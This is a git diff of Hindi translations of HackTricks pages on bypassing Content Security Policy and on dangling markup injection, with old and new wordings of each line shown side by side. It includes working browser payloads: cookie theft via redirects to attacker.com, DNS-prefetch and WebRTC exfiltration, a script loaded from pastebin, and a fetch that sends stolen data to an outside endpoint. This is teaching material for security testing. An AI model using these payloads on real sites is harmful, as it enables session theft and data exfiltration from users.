@ -501,17 +496,17 @@ console.log(prefix);
run();
</script>
```
### बुकमार्कलेट के माध्यम से
### बुकमार्कलेट्स के माध्यम से
इस हमले में हमलावर्ती **उपयोगकर्ता को यह धोखा देना होगा कि वह ब्राउज़र के बुकमार्कलेट पर एक लिंक को खींचकर छोड़ दें**। यह बुकमार्कलेट **हानिकारक जावास्क्रिप्ट** कोड को समेत करेगा जो जब खींचकर छोड़ा जाएगा या क्लिक किया जाएगा, तो वह मौजूदा वेब विंडो के संदर्भ में निष्पादित होगा, **सीएसपी को छलकाने के लिए और संवेदनशील जानकारी चोरी करने के लिए** जैसे कि कुकीज़ या टोकन।
इस हमले में कुछ सामाजिक इंजीनियरिंग शामिल होगी जहाँ हमलावर **उपयोगकर्ता को ब्राउज़र के बुकमार्कलेट पर एक लिंक को ड्रैग और ड्रॉप करने के लिए मनाता है**। यह बुकमार्कलेट **दुर्भावनापूर्ण जावास्क्रिप्ट** कोड होगा जो ड्रैग\&ड्रॉप किया गया या क्लिक किया गया होगा जो वर्तमान वेब विंडो के संदर्भ में निष्पादित होगा, **CSP को बायपास करके संवेदनशील जानकारी जैसे कि कुकीज़ या टोकन चुराने की अनुमति देगा**
अधिक जानकारी के लिए [**यहा मूल रिपोर्ट देखें**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
अधिक जानकारी के लिए [**यहा मूल रिपोर्ट देखें**](https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/).
### सीएसपी को प्रतिबंधित करके सीएसपी को छलकाना
### CSP को प्रतिबंधित करके CSP बायपास
[**इस CTF व्रिटअप में**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), सीएसपी को छलकाने के लिए एक अनुमति प्राप्त आइफ्रेम में एक और सीएसपी डालकर अनुमति दी गई है जो एक विशेष JS फ़ाइल को लोड करने की अनुमति नहीं देती है, फिर उसे **प्रोटोटाइप प्रदूषण** या **डॉम क्लॉबरिंग** के माध्यम से एक अलग स्क्रिप्ट का उपयोग करने की अनुमति देती है जो **एक अनियमित स्क्रिप्ट को लोड करने के लिए दुरुपयोग करने की अनुमति देता है**।
[**इस CTF राइटअप में**](https://github.com/google/google-ctf/tree/master/2023/web-biohazard/solution), CSP को एक अनुमत इफ्रेम के अंदर एक अधिक प्रतिबंधित CSP इंजेक्ट करके बायपास किया गया है जिसने एक विशिष्ट JS फ़ाइल को लोड करने से मना किया था, जो फिर, **प्रोटोटाइप प्रदूषण** या **डोम क्लॉबरिंग** के माध्यम से **एक अलग स्क्रिप्ट का उपयोग करके मनमानी स्क्रिप्ट लोड करने की अनुमति देता है**।
आप एक आइफ्रेम की सीएसपी को **`csp`** विशेषता के साथ प्रतिबंधित कर सकते हैं:
आप **`csp`** विशेषता के साथ एक इफ्रेम के CSP को **प्रतिबंधित कर सकते हैं**:
{% code overflow="wrap" %}
```html
@ -519,113 +514,111 @@ run();
```
{% endcode %}
[**इस CTF writeup**](https://github.com/aszx87410/ctf-writeups/issues/48) में, **HTML injection** के माध्यम से **CSP** को और अधिक **प्रतिबंधित**िया जा सकता था, इससे CSTI को रोकने वाला स्क्रिप्ट अक्षम हो गया और इस प्रकार **दुर्बलता उपयोगी बन गई।**\
CSP को **HTML मेटा टैग** का उपयोग करके और इनलाइन स्क्रिप्ट को **हटाकर** और उनकी **नॉन्स** को अनुमति देने वाले **एंट्री** को **शानुसार इनलाइन स्क्रिप्ट सक्षम करें**:
इस [**CTF लेखन**](https://github.com/aszx87410/ctf-writeups/issues/48) में, **HTML इंजेक्शन** के माध्यम से **CSP** को और अधिक **प्रतिबंधित**रना संभव था ताकि CSTI को रोकने वाली स्क्रिप्ट को अक्षम किया जा सके और इस प्रकार **भेद्यता शोषण योग्य बन गई।**\
CSP को **HTML मेटा टैग्स** का उपयोग करके अधिक प्रतिबंधित बनाया जा सकता है और इनलाइन स्क्रिप्ट्स को उनके **nonce** की **प्रविष्टि** को **हटाकर** अक्षम किया जा सकता है और **sha** के माध्यम से विशिष्ट इनलाइन स्क्रिप्ट को सक्षम किया जा सकता है:
```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
```
### Content-Security-Policy-Report-Only के साथ JS निर्यात
### JS निष्कासन Content-Security-Policy-Report-Only के साथ
यदि आप सर्वर को उत्तर देने के लिए **`Content-Security-Policy-Report-Only`** हैडर के साथ एक **आपके द्वारा नियंत्रित मान** के साथ संपर्क कर सकते हैं (शायद CRLF के कारण), तो आप इसे अपने सर्वर की ओर इशारा कर सकते हैं और यदि आप जिस JS सामग्री को निर्यात करना चाहते हैं उसे **`<script>`** के साथ **ढक देते हैं** और क्योंकि संभावतः `unsafe-inline` को CSP द्वारा अनुमति नहीं होगी, इससे एक CSP त्रुटि उत्पन्न होगी और स्क्रिप्ट का एक हिस्सा (संवेदनशील जानकारी को समेत) `Content-Security-Policy-Report-Only` से सर्वर को भेजा जाएगा।
यदि आप सर्वर को **`Content-Security-Policy-Report-Only`** हेडर के साथ प्रतिक्रिया देने के लिए प्रबंधित कर सकते हैं जिसका **मूल्य आपके द्वारा नियंत्रित होता है** (शायद CRLF के कारण), आप इसे अपने सर्वर की ओर इंगित कर सकते हैं और यदि आप **JS सामग्री** को **`<script>`** के साथ **लपेटते हैं** जिसे आप निष्कासित करना चाहते हैं और क्योंकि CSP द्वारा `unsafe-inline` की अनुमति नहीं होने की संभावना है, यह **CSP त्रुटि को ट्रिगर करेगा** और स्क्रिप्ट का हिस्सा (संवेदनशील जानकारी युक्त) `Content-Security-Policy-Report-Only` से सर्वर को भेजा जाएगा।
एक उदाहरण के लिए [**इस CTF व्रिटअप की जांच करें**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes)
उदाहरण के लिए [**इस CTF लेखन को देखें**](https://github.com/maple3142/My-CTF-Challenges/tree/master/TSJ%20CTF%202022/Nim%20Notes).
### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
```
### जानकारी लीक करना CSP + आइफ्रेम
### CSP + Iframe के माध्यम से जानकारी का लीक होना
सोचिए एक स्थिति जहां एक **पेज एक गुप्त विवरण के साथ एक अलग पेज पर रीडायरेक्ट हो रहा है** उपयोगकर्ता के आधार पर। उदाहरण के लिए, उपयोगकर्ता **एडमिन** जो **redirectme.domain1.com** तक पहुंचता है, वह **adminsecret321.domain2.com** पर रीडायरेक्ट होता है और आप एडमिन के पास XSS का कारण बना सकते हैं।
**इसके अलावा, रीडायरेक्ट होने वाले पेजों को सुरक्षा नीति द्वारा अनुमति नहीं है, लेकिन रीडायरेक्ट करने वाले पेज को है।**
कल्पना कीजिए कि एक **पेज अलग पेज पर रीडायरेक्ट** हो रहा है जिसमें **यूजर के आधार पर एक गुप्त जानकारी है**। उदाहरण के लिए, **admin** यूजर **redirectme.domain1.com** को एक्सेस करते समय **adminsecret321.domain2.com** पर रीडायरेक्ट हो जाता है और आप admin के लिए XSS का कारण बन सकते हैं।\
**इसके अलावा, जिन पेजों को रीडायरेक्ट किया जाता है उन्हें सुरक्षा नीति द्वारा अनुमति नहीं है, लेकिन जो पेज रीडायरेक्ट करता है उसे अनुमति है।**
आप एडमिन को रीडायरेक्ट किए जाने वाले डोमेन को निम्नलिखित के माध्यम से लीक कर सकते हैं:
आप निम्नलिखित के माध्यम से admin के रीडायरेक्ट होने वाले डोमेन का पता लगा सकते हैं:
* **CSP उल्लंघन के माध्यम से**
* **CSP नियमों के माध्यम से।**
CSP उल्लंघन तत्काल लीक होता है। करने के लिए, `https://redirectme.domain1.com` पर पोइंट करने वाले एक आइफ्रेम लोड करें और `securitypolicyviolation` घटना को सुनें जिसमें `blockedURI` संपत्ति शामिल होती है जिसमें ब्लॉक हुए URI का डोमेन होता है। यह इसलिए है क्योंकि `https://redirectme.domain1.com` (CSP द्वारा अनुमति दी गई) `https://adminsecret321.domain2.com` पर रीडायरेक्ट होता है (**CSP द्वारा अवरुद्ध** किया गया)। यह CSP के साथ आइफ्रेम को कैसे हैंडल करना है के अनिर्धारित व्यवहार का उपयोग करता है। Chrome और Firefox इसके संबंध में अलग-अलग व्यवहार करते हैं।
CSP उल्लंघन एक तत्काल लीक है। इसके लिए केवल `https://redirectme.domain1.com` की ओर इशारा करने वाले एक iframe को लोड करना होता है और `securitypolicyviolation` इवेंट को सुनना होता है जिसमें `blockedURI` प्रॉपर्टी होती है जिसमें ब्लॉक किए गए URI का डोमेन होता है। यह इसलिए है क्योंकि `https://redirectme.domain1.com` (CSP द्वारा अनुमति) `https://adminsecret321.domain2.com` पर रीडायरेक्ट होता है (**CSP द्वारा ब्लॉक**). यह CSP के साथ iframes को हैंडल करने के अपरिभाषित व्यवहार का उपयोग करता है। Chrome और Firefox इस संबंध में अलग तरह से व्यवहार करते हैं।
जब आप गुप्त उपडोमेन को संयोजित करने वाले अक्षरों को जानते हैं, तो आप एक बाइनरी सर्च का उपयोग कर सकते हैं और जांच सकते हैं कि कब CSP ने संसाधन को अवरुद्ध किया और कब नहीं, और इसके लिए CSP में विभिन्न निषिद्ध डोमेन बना सकते हैं (इस मामले में गुप्त डोमेन दस्तावेज़-X-XXXX.secdrivencontent.dev के रूप में हो सकता है)।
जब आप जानते हैं कि गुप्त सबडोमेन बनाने वाले अक्षर क्या हो सकते हैं, तो आप बाइनरी सर्च का उपयोग कर सकते हैं और जांच सकते हैं कि CSP ने कब संसाधन को ब्लॉक किया और कब नहीं, अलग-अलग निषिद्ध डोमेन CSP में बनाकर (इस मामले में गुप्त रूप doc-X-XXXX.secdrivencontent.dev में हो सकता है)
```
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
```
यहां से ट्रिक [**यहां**](https://ctftime.org/writeup/29310) से है
ट्रिक [**यहाँ से**](https://ctftime.org/writeup/29310)।
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof सभी क्रिप्टो बग बाउंटी के लिए घर है।**
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\
HackenProof बाउंटी केवल तब शुरू होते हैं जब उनके ग्राहक पुरस्कार बजट जमा करते हैं। आपको बग सत्यापित होने के बाद पुरस्कार मिलेगा।
**हैकिंग इनसाइट्स**\
हैकिंग के रोमांच और चुनौतियों के बारे में गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।
**रियल-टाइम हैक न्यूज़**\
रियल-टाइम न्यूज़ और इनसाइट्स के माध्यम से हैकिंग की तेज़ी से बदलती दुनिया के साथ अपडेट रहें
**वेब3 हैकर लीजेंड बनें**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
**नवीनतम घोषणाएँ**\
नवीनतम बग बाउंटीज़ लॉन्चिंग और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करना शुरू करें!
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
{% embed url="https://hackenproof.com/register" %}
## CSP को बायपास करने के लिए असुरक्षित तकनीकें
## सीएसपी को बाईपास करने के लिए असुरक्षित तकनीकें
### PHP रिस्पॉन्स बफर ओवरलोड
### PHP प्रतिक्रिया बफर ओवरलोड
PHP को **4096** बाइट्स तक **रिस्पॉन्स बफरिंग** के लिए जाना जाता है। इसलिए, अगर PHP में कोई चेतावनी दिखाई दे रही है, तो **पर्याप्त डेटा चेतावनियों के अंदर प्रदान करके**, **रिस्पॉन्स** को **CSP हेडर से पहले** **भेजा** जा सकता है, जिससे हेडर को अनदेखा किया जा सकता है।\
तब, तकनीक मूल रूप से **रिस्पॉन्स बफर को चेतावनियों से भरने** में होती है ताकि CSP हेडर न भेजा जाए।
PHP के लिए मान्यता प्राप्त है कि यह डिफ़ॉल्ट रूप से प्रतिक्रिया को 4096 बाइट तक बफर करता है। इसलिए, यदि PHP एक चेतावनी दिखा रहा है, तो **चेतावनियों के अंदर पर्याप्त डेटा प्रदान करके**, **प्रतिक्रिया** को **सीएसपी हैडर** से **पहले** **भेज दिया जाएगा**, जिससे हैडर को अनदेखा कर दिया जाएगा।\
फिर, तकनीक मूल रूप से **चेतावनियों के साथ प्रतिक्रिया बफर भरने** का है ताकि सीएसपी हैडर न भेजा जाए।
विचार [**इस राइटअप से**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points)।
यह विचार [**इस व्राइटअप**](https://hackmd.io/@terjanq/justCTF2020-writeups#Baby-CSP-web-6-solves-406-points) से है।
### एरर पेज को फिर से लिखना
### त्रुटि पृष्ठ पुनर्लेखन
[**इस व्राइटअप**](https://blog.ssrf.kr/69) से लगता है कि एक सीएसपी सुरक्षा को बाईपास करना संभव था जिसमें एक त्रुटि पृष्ठ (संभवतः सीएसपी के बिना) लोड करने और इसकी सामग्री को पुनर्लेखित करने की संभावना थी।
[**इस राइटअप से**](https://blog.ssrf.kr/69) ऐसा प्रतीत होता है कि CSP सुरक्षा को बायपास करना संभव था एक एरर पेज (संभवतः CSP के बिना) को लोड करके और उसकी सामग्री को फिर से लिखकर।
```javascript
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);
```
### कुछ + 'self' + वर्डप्रेस
### SOME + 'self' + wordpress
कुछ एक तकनीक है जो एक पेज के एक एंडपॉइंट में XSS (या अत्यंत सीमित XSS) का दुरुपयोग करती है ताकि उसी मूल स्रोत के अन्य एंडपॉइंट का दुरुपयोग किया जा सके। इसे हमलेबाज़ पेज से विकल्पी एंडपॉइंट लोड करके और फिर उसी मूल स्रोत में हमलेबाज़ पेज को रीफ़्रेश करके किया जाता है। इस तरीके से, विकल्पी एंडपॉइंट वास्तविक एंडपॉइंट के DOM तक पहुंचने के लिए अपने पेयलोड में 'ओपनर' ऑब्जेक्ट का उपयोग कर सकता है। अधिक जानकारी के लिए देखें:
SOME एक तकनीक है जो एक पेज के एंडपॉइंट में XSS (या अत्यधिक सीमित XSS) का दुरुपयोग करती है ताकि उसी मूल के **अन्य एंडपॉइंट्स का दुरुपयोग किया जा सके।** यह एक हमलावर पेज से कमजोर एंडपॉइंट को लोड करके और फिर हमलावर पेज को उसी मूल के वास्तविक एंडपॉइंट पर रिफ्रेश करके किया जाता है जिसे आप दुरुपयोग करना चाहते हैं। इस तरह से **कमजोर एंडपॉइंट** **`opener`** ऑब्जेक्ट का उपयोग करके **पेलोड** में **DOM को एक्सेस** कर सकता है **वास्तविक एंडपॉइंट का दुरुपयोग करने के लिए**। अधिक जानकारी के लिए देखें:
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md](../xss-cross-site-scripting/some-same-origin-method-execution.md)
{% endcontent-ref %}
इसके अलावा, **वर्डप्रेस** में `/wp-json/wp/v2/users/1?_jsonp=data` में एक **JSONP** एंडपॉइंट है जो आउटपुट में भेजे गए **डेटा** को **प्रतिबिंबित** करेगा (केवल अक्षर, संख्या और डॉट की सीमा के साथ).
इसके अलावा, **wordpress** में `/wp-json/wp/v2/users/1?_jsonp=data` पर एक **JSONP** एंडपॉइंट है जो आउटपुट में भेजे गए **डेटा** को **प्रतिबिंबित** करेगा (केवल अक्षर, संख्या और बिंदुओं की सीमा के साथ)।
एक हमलेबाज़ उस एंडपॉइंट का दुरुपयोग करके वर्डप्रेस के खिलाफ एक कुछ हमला उत्पन्न कर सकता है और इसे `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` में सम्मिलित कर सकता है ध्यान दें कि यह **स्क्रिप्ट** लोड होगा क्योंकि इसे 'self' द्वारा अनुमति दी जाती है। इसके अलावा, और क्योंकि वर्डप्रेस स्थापित है, एक हमलेबाज़ उपयोगकर्ता को अधिक अधिकार प्रदान करने, एक नया प्लगइन स्थापित करने के लिए **CSP को दुर्भाग्यपूर्ण** **कॉलबैक** एंडपॉइंट का दुरुपयोग कर सकता है...\
इस हमले को कैसे करें इसके बारे में अधिक जानकारी के लिए देखें [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
एक हमलावर उस एंडपॉइंट का दुरुपयोग करके WordPress के खिलाफ SOME हमला **उत्पन्न कर सकता है** और इसे `<script src="/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` के अंदर **एम्बेड** कर सकता है, ध्यान दें कि यह **स्क्रिप्ट** लोड हो जाएगी क्योंकि यह **'self' द्वारा अनुमति है**। इसके अलावा, और क्योंकि WordPress स्थापित है, एक हमलावर **SOME हमले** का दुरुपयोग कर सकता है **कमजोर** **कॉलबैक** एंडपॉइंट के माध्यम से जो **CSP को बायपास** करता है ताकि एक उपयोगकर्ता को अधिक विशेषाधिकार दिए जा सकें, एक नया प्लगइन स्थापित किया जा सके...\
इस हमले को कैसे करें इसके बारे में अधिक जानकारी के लिए [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/) देखें।
## CSP Exfiltration Bypasses
यदि एक सख्त CSP है जो आपको **बाहरी सर्वरों के साथ संवाद करने** की अनुमति नहीं देता है, तो आप कुछ ऐसी चीजें कर सकते हैं जिससे आप जानकारी को बाहर निकाल सकते हैं
यदि एक सख्त CSP है जो आपको बाहरी सर्वरों के साथ **इंटरैक्ट** करने की अनुमति नहीं देता है, तो कुछ चीजें हैं जो आप हमेशा कर सकते हैं जानकारी को बाहर निकालने के लिए
### स्थान
### Location
आप बस स्थान को अपडेट कर सकते हैं ताकि गुप्त जानकारी को हमलेबाज़ सर्वर को भेज सकें:
आप सिर्फ लोकेशन को अपडेट कर सकते हैं ताकि हमलावर के सर्वर को गुप्त जानकारी भेजी जा सके:
```javascript
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
```
### मेटा टैग
आप एक मेटा टैग इंजेक्शन के माध्यम से पुनर्निर्देशित कर सकते हैं (यह केवल एक पुनर्निर्देशन है, यह सामग्री नहीं लीक करेगा)
आप मेटा टैग इंजेक्ट करके रीडायरेक्ट कर सकते हैं (यह केवल एक रीडायरेक्ट है, इससे सामग्री लीक नहीं होगी)
```html
<meta http-equiv="refresh" content="1; http://attacker.com">
```
### DNS प्रीफेच
पेज को तेजी से लोड करने के लिए, ब्राउज़र होस्टनेम को पहले से ही IP पते में बदलने के लिए प्री-रिज़ॉल्व करेगा और उन्हें बाद में कैश करेगा।\
आप एक ब्राउज़र को होस्टनेम को पहले से ही रिज़ॉल्व करने के लिए इस्तेमाल कर सकते हैं: `<link reol="dns-prefetch" href="something.com">`
पेजों को तेजी से लोड करने के लिए, ब्राउज़र पहले से होस्टनेम को IP पते में बदलकर उन्हें कैश कर लेते हैं ताकि बाद में उपयोग किया जा सके।\
आप ब्राउज़र को होस्टनेम प्री-रिज़ॉल्व करने के लिए इशारा कर सकते हैं: `<link reol="dns-prefetch" href="something.com">`
आप इस व्यवहार का दुरुपयोग करके **DNS अनुरोधों के माध्यम से संवेदनशील जानकारी को बाहर निकाल सकते हैं**:
आप इस व्यवहार का दुरुपयोग कर हैं **DNS अनुरोधों के माध्यम से संवेदनशील जानकारी को बाहर निकालने के लिए**:
```javascript
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
@ -638,19 +631,19 @@ linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
```
इससे बचने के लिए सर्वर HTTP हेडर भेज सकता है:
सर्वर द्वारा इसे रोकने के लिए HTTP हेडर भेजा जा सकता है:
```
X-DNS-Prefetch-Control: off
```
{% hint style="info" %}
जाहिर है, यह तकनीक headless ब्राउज़रों (बॉट) में काम नहीं करती है
जाहिर तौर पर, यह तकनीक हेडलेस ब्राउज़र्स (बॉट्स) में काम नहीं करती है
{% endhint %}
### WebRTC
कई पेजों पर आप पढ़ सकते हैं कि **WebRTC `connect-src` नीति** की जांच नहीं करता है
कई पृष्ठों पर आप पढ़ सकते हैं कि **WebRTC `connect-src` नीति की जांच नहीं करता है** CSP की.
वास्तव में आप एक _DNS अनुरोध_ का उपयोग करके जानकारी को _विसर्जित_ कर सकते हैं। इस कोड की जांच करें:
वास्तव में आप _DNS अनुरोध_ का उपयोग करके जानकारी _leak_ कर सकते हैं। इस कोड को देखें:
```javascript
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
```
@ -666,7 +659,7 @@ var pc = new RTCPeerConnection({
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
```
## ऑनलाइन CSP नीतियों की जांच करें
## CSP नीतियों की जांच ऑनलाइन
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
@ -688,29 +681,29 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
**HackenProof क्रिप्टो बग बाउंटी के लिए घर है।**
[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों और अनुभवी हैकर्स और बग बाउंटी हंटर्स के साथ संवाद करें!
**देरी के बिना पुरस्कार प्राप्त करें**\
HackenProof बाउंटी केवल तब शुरू होती है जब उनके ग्राहक पुरस्कार बजट जमा करते हैं। बग सत्यापित होने के बाद आपको पुरस्कार मिलेगा।
**Hacking Insights**\
हैकिंग के रोमांच और चुनौतियों पर गहराई से जानकारी प्राप्त करें
**वेब3 पेंटेस्टिंग में अनुभव प्राप्त करें**\
ब्लॉकचेन प्रोटोकॉल और स्मार्ट कॉन्ट्रैक्ट्स नई इंटरनेट हैं! उनके उभरते दिनों में वेब3 सुरक्षा को मास्टर करें।
**Real-Time Hack News**\
वास्तविक समय की हैकिंग समाचार और अंतर्दृष्टि के माध्यम से तेजी से बदलते हैकिंग विश्व के साथ अद्यतन रहें
**वेब3 हैकर लीजेंड बनें**\
प्रत्येक सत्यापित बग के साथ प्रतिष्ठा अंक प्राप्त करें और साप्ताहिक लीडरबोर्ड के शीर्ष पर विजयी बनें।
**Latest Announcements**\
नवीनतम बग बाउंटीज के शुभारंभ और महत्वपूर्ण प्लेटफॉर्म अपडेट्स के साथ सूचित रहें
[**HackenProof पर साइन अप करें**](https://hackenproof.com/register) और अपने हैक्स से कमाई करें!
{% embed url="https://hackenproof.com/register" %}
[**Discord**](https://discord.com/invite/N3FrSbmwdy) पर हमसे जुड़ें और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) या [**telegram group**](https://t.me/peass) में **शामिल हों** या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>

160
pentesting-web/dangling-markup-html-scriptless-injection/README.md
View file

@ -1,109 +1,87 @@
# डैंगलिंग मार्कअप - एचटीएमएल स्क्रिप्टलेस इंजेक्शन
# Dangling Markup - HTML scriptless injection
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड** करने का एक्सेस चाहते हैं? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएएसएस परिवार**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**एनएफटीएस**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक पीएएसएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें,** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
